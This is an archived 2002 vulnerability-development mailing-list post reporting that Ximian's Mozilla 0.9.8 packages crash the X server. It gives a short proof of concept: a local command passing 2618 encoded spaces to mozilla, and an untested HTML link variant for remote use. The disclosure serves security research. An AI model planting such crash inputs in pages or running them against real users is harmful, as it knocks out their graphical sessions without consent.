Vulnerability Development mailing list archives
Ximian Mozilla: The 2618 Bug
From: "Replugge [Rod]" <replugge () alcoholico org>
Date: 17 Feb 2002 17:24:28 +0100
NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't make it since this doesn't seem to affect a redhat itself, it affects the mozilla packages distrbuted by Ximian: The test system look like: bash#~ rpm -qa | grep mozilla mozilla-0.9.8-1.ximian.2 mozilla-mail-0.9.8-1.ximian.2 mozilla-xmlterm-0.9.8-1.ximian.2 mozilla-devel-0.9.8-1.ximian.2 nautilus-mozilla-1.0.6-ximian.4 mozilla-psm-0.9.8-1.ximian.2 kdebindings-kmozilla-2.1.1-1 This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the the updates). There is a bug in mozilla 0.9.8-1 which allows you to Crash the X server. I won't go into details I'll just show the proof of concept. exploit: Local: bash#~ mozilla `perl -e "print '%20' x 2618"` Remote: I haven't test this but i guess: echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >> ./attack.html perhaps using "img src" or java script... Best Regards -- /* Rodrigo Gutierrez <rodrigo () trustix com> Trustix AS http://www.trustix.com */
Current thread:
- Ximian Mozilla: The 2618 Bug Replugge [Rod] (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug Vadim Berezniker (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug Replugge [Rod] (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug NyQuist (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug NyQuist (Feb 17)
- Re: Ximian Mozilla: The 2618 Bug Vadim Berezniker (Feb 17)